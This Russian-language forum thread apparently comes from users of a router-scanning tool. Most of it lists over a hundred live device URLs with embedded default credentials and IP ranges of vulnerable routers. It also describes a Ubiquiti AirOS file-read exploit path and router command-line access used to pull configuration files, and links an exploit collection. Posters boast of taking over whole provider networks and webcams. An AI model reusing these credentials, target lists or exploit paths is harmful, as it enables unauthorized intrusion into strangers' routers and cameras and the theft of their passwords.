Вся доступная память забилась... Вообще-то я уже говорил, что RS на XP работает менее стабильно, чем на более новых ОС. Ммм... видимо у вас доступ к этому IP есть, а у меня нет. С моей стороны соединение не проходит. Вижу. Для начала проверьте, что словари basic/digest одинаковые у двух версий. А ещё вы могли бы скинуть дамп TCP пакетов, сделанный средствами программы. Возможно, многое удалось бы понять. Надо изучать запросы, сравнивать "до" и "после". Такое теоретически возможно (если какой-то эксплойт подошёл). Это вряд ли.
спасибо за совет. я уже разобрался. вы правы.слишком увлекся пасами. только мой пост еще не прошел модерацию, вот и запоздал с ответом кстати - вы говорите доступа нет. и РС тоже ничего не находит? у меня доступа также не наблюдается. но пасы вытягивает
Spoiler: Forth ONU Access Point http://super:[email protected]:8080/ http://super:[email protected]:8080/ http://super:[email protected]:8080/ http://super:[email protected]:8080/ http://super:[email protected]:8080/ http://super:[email protected]:8080/ http://super:[email protected]:8080/ http://super:[email protected]:8080/ http://super:[email protected]:8080/ http://super:[email protected]:8080/ http://super:[email protected]:8080/ http://super:[email protected]:8080/ http://super:[email protected]:8080/ http://super:[email protected]:8080/ http://super:[email protected]:8080/ http://super:[email protected]:8080/ http://super:[email protected]:8080/ http://super:[email protected]:8080/ http://super:[email protected]:8080/ http://super:[email protected]:8080/ http://super:[email protected]:8080/ http://super:[email protected]:8080/ http://super:[email protected]:8080/ http://super:[email protected]:8080/ http://super:[email protected]:8080/ http://super:[email protected]:8080/ http://super:[email protected]:8080/ http://super:[email protected]:8080/ http://super:[email protected]:8080/ http://super:[email protected]:8080/ http://super:[email protected]:8080/ http://super:[email protected]:8080/ http://super:[email protected]:8080/ http://super:[email protected]:8080/ http://super:[email protected]:8080/ http://super:[email protected]:8080/ http://super:[email protected]:8080/ http://super:[email protected]:8080/ http://super:[email protected]:8080/ http://super:[email protected]:8080/ http://super:[email protected]:8080/ http://super:[email protected]:8080/ http://super:[email protected]:8080/ http://super:[email protected]:8080/ http://super:[email protected]:8080/ http://super:[email protected]:8080/ http://super:[email protected]:8080/ http://super:[email protected]:8080/ http://super:[email protected]:8080/ http://super:[email protected]:8080/ http://super:[email protected]:8080/ http://super:[email protected]:8080/ http://super:[email protected]:8080/ http://super:[email protected]:8080/ http://super:[email protected]:8080/ http://super:[email protected]:8080/ http://super:[email protected]:8080/ http://super:[email protected]:8080/ http://super:[email protected]:8080/ http://super:[email protected]:8080/ http://super:[email protected]:8080/ http://super:[email protected]:8080/ http://super:[email protected]:8080/ http://super:[email protected]:8080/ http://super:[email protected]:8080/ http://super:[email protected]:8080/ http://super:[email protected]:8080/ http://super:[email protected]:8080/ http://super:[email protected]:8080/ http://super:[email protected]:8080/ http://super:[email protected]:8080/ http://super:[email protected]:8080/ http://super:[email protected]:8080/ http://super:[email protected]:8080/ http://super:[email protected]:8080/ http://super:[email protected]:8080/ http://super:[email protected]:8080/ http://super:[email protected]:8080/ http://super:[email protected]:8080/ http://super:[email protected]:8080/ http://super:[email protected]:8080/ http://super:[email protected]:8080/ http://super:[email protected]:8080/ http://super:[email protected]:8080/ http://super:[email protected]:8080/ http://super:[email protected]:8080/ http://super:[email protected]:8080/ http://super:[email protected]:8080/ http://super:[email protected]:8080/ http://super:[email protected]:8080/ http://super:[email protected]:8080/ http://super:[email protected]:8080/ http://super:[email protected]:8080/ http://super:[email protected]:8080/ http://super:[email protected]:8080/ http://super:[email protected]:8080/ http://super:[email protected]:8080/ http://super:[email protected]:8080/ http://super:[email protected]:8080/ http://super:[email protected]:8080/ http://super:[email protected]:8080/ http://super:[email protected]:8080/ http://super:[email protected]:8080/ http://super:[email protected]:8080/ http://super:[email protected]:8080/ http://super:[email protected]:8080/ http://super:[email protected]:8080/ http://super:[email protected]:8080/ http://super:[email protected]:8080/ http://super:[email protected]:8080/ http://super:[email protected]:8080/ http://super:[email protected]:8080/ http://super:[email protected]:8080/ http://super:[email protected]:8080/ http://super:[email protected]:8080/ http://super:[email protected]:8080/ http://super:[email protected]:8080/ http://super:[email protected]:8080/ http://super:[email protected]:8080/ http://super:[email protected]:8080/ http://super:[email protected]:8080/ http://super:[email protected]:8080/ http://super:[email protected]:8080/ http://super:[email protected]:8080/ http://super:[email protected]:8080/ http://super:[email protected]:8080/ http://super:[email protected]:8080/
Shenzhen AirTouch 3G Wireless Router - парсит не всю информацию (прежде всего, нет BSSID - уже почти 7.5 тыс. таких точек в базе), хотя получает её с главной страницы (BSSID это var lan_mac = "..", не перепутать только с закомментированным //var lan_mac=".."). http://admin:[email protected]/ http://admin:[email protected]/ http://admin:[email protected]/ и т.д. (могут переместиться, но вроде всегда какие-то есть в 178.91.158.0/24) Что-то у меня выдаёт ошибку: Failed to switch TCP logging. Да и charlie под рукой нет, поэтому в таком виде: http://rghost.ru/7RZSTNjqT
на Ubiquiti AirOs неплохой сплойт http://IP /admin.cgi/ds.css можно вытащить любой фал. вот что получилось ubnt:KkkTyBbxS. правда не на всех прошивках срабатывает, но количество сработанных достаточно. только с кодировкой пока нет времени разбираться. если вытащить конфиги, то можно вытаскивать пасы. может кому пригодится. в рутерскане кажется убигути поддерживает только парс дефолтов. во всяком случае сплойтов в РС не нашел. может кому пригодится.если уважаемого binarymaster заинтересует - могу скинуть валидный апи для анализа
Уже давно и много раз слышал об этом эксплойте, но всё упирается в тот факт, что пароль к админке - хеширован. А по хешу в веб интерфейс не зайдёшь.
Эта уязвимость закончилась на версии 4,0,хх. Сейчас уже 9 из 10 устройств в эфире с прошивкой версии 5,5 и больше. Вообще там новый тип хеша. А со старым хешем проблем не было. DES(Unix) поддается бруту, а Ubiquiti AirOs ограничивала пароль до восьми символов. В чем может быть польза для сканирования сети, так это узнавание пароля пусть даже одного из 100500 с сети со старой прошивкой, а потом проход повторно с уже с этим паролем по другим точкам. Одна паршивая овца сдаст всю сеть.
Сразу оговорюсь, что на работоспособность программы это не влияет, но при сканировании модулем HNAP точек Cisco Linksys Smart Wi-Fi в логах появляется сообщение об исключении (статус, соответственно, остаётся на "Checking HNAP...") 37.2O4.79.61 85.3O.219.15 1O9.173.96.110 ONT GPON Home Gateway - при сканировании порта 443 зависает на "Trying to log in...", а так как их обычно много идёт подряд, то жёстко тормозит Router Scan и систему в целом. http://rghost.ru/8JpnPqDTG - сессия charles https://2.l32.73.40/ https://2.l32.73.52/ или, например, диапазон 2.132.78.0/23 Shenzhen AirTouch 3G Wireless Router - неправильная кодировка SSID: Алтын --> Алтын http://rghost.ru/8w5qXGCJ9 - сессия charles http://admin:[email protected]/ Huawei EchoLife HG8245 GPON Terminal (defaults: root/admin) http://rghost.ru/7rBTrTnS5 - сессия charles http://2.132.78.42/ http://2.132.78.73/ http://2.132.78.215/ http://2.132.79.95/
NETGEAR WNR2000 (испанский язык интерфейса) - показывает не всю информацию (оно и понятно - парсер расчитан на поиск английских слов). Но главное, что при этом затирает данные, успешно полученные с помощью уязвимости. http://rghost.ru/87hC7Rkjg - cap файл http://admin:[email protected]:808O/ http://admin:[email protected]:808O/
доброго времени суток всем. ну на счет 4.0 не совсем так. такая уязвимость была до версии прошивки 5.3.3 включительно.уже с версии 5.3.5 - пофиксено.но не в этом дело. дело в том, что может в россии и мало таких роутеров, а в других местах ( например у нас) таких ну примерно 4 из 10. все зависит от провайдера и от того, когда был установлен нет. сейчас или немного раньше. а прошивки естественно никто не менят вот это точно. чем и воспользовался пару дней назад с этим убигути.сдал все, в том числе и вебки и кстати не только пасы. есть провы которые устанавливают один пин на все рутер-вайфаи. и ( что актуально для любителей вебкамер) - если рядом апишки (с сидами и пасами) роутера и вебки - то где-то рядом и пас на вебку проверено неоднократно
ну шифровка думаю однотипная. например в нете шифр на ubnt везде один и тот же, как на скрние, представленном уважаемым Payer. значит весь шифр идет одинаково. и еще - на странице по указанной ссылке есть такой пункт Command Line, который позволяет проводить произвольные ункис-команды. например LS и другие прямо на странице роутера. думаю это тоже интересно. например вот результат команды ls папки admin-cgi Spoiler: LS 110114.1441 English.txt admin.cgi advanced.cgi airview.cgi airview.jar.pack.gz airview.jnlp ajax.js ajax.js.gz apply.cgi arp.cgi blank.html bluecurve.css boxsizing.htc brmacs.cgi cfg.cgi config.cgi deployJava.js deployJava.js.gz deployJava.txt dhcpc.cgi dhcpc.js dhcpc.js.gz dhcpcinfo.cgi discard.cgi discovery.cgi discovery.js discovery.js.gz favicon.ico firewall.cgi fw.cgi fwflash.cgi help help.css help.js help.js.gz images index.cgi index.html index.js index.js.gz info.cgi ipalias.cgi ipscan.cgi jquery-ui.css jquery-ui.css.gz js jsl10n.cgi jsval.js jsval.js.gz language.cgi leases.cgi lib link.cgi log.cgi login.cgi login.css logo.cgi logout.cgi network.cgi network.js network.js.gz pfw.cgi pingtest.cgi pingtest.css pingtest.js pingtest.js.gz pingtest_action.cgi poll.cgi port_forward.cgi pppinfo.cgi progress.js progress.js.gz reboot.cgi reset.cgi routes.cgi scan_channels.cgi services.cgi signal.cgi signal.js signal.js.gz signal_gui.cgi slider-min.js slider-min.js.gz slink.js slink.js.gz sorttable.js sorttable.js.gz speedtest.css sptest.cgi sptest.js sptest.js.gz sptest_action.cgi sroutes.cgi sshd-authkeys.cgi sta.cgi stainfo.cgi stainfo.js stainfo.js.gz stakick.cgi stalist.cgi stalist.js stalist.js.gz status-403.html status-404.html status-500.html status.cgi style.css style.css.gz support.cgi survey.cgi survey.css survey.json.cgi system.cgi system.js system.js.gz test.cgi testdone.cgi throughput.cgi throughput.js throughput.js.gz ticket.cgi tool.cgi traceroute.cgi traceroute.css traceroute.js traceroute.js.gz traceroute_action.cgi ubnt.cgi upgrade.cgi util.js util.js.gz выбираем то, что нужно, даем команду cat (нужный файл) и смотрим
может кому пригодится - тут набор эксплойтов к роутерам. https://github.com/hkm/routerpwn.com есть даже свеженькие. по дате смотрю. еще не разбирался вплотную сайт автора www.routerpwn.com есть интересные вещи, и в отличии от 0дэйтудэй - бесплатно вот там нашел на хомгатевей http://192.168.0.1/restoreinfo.cgi. все воевал с ним последние дни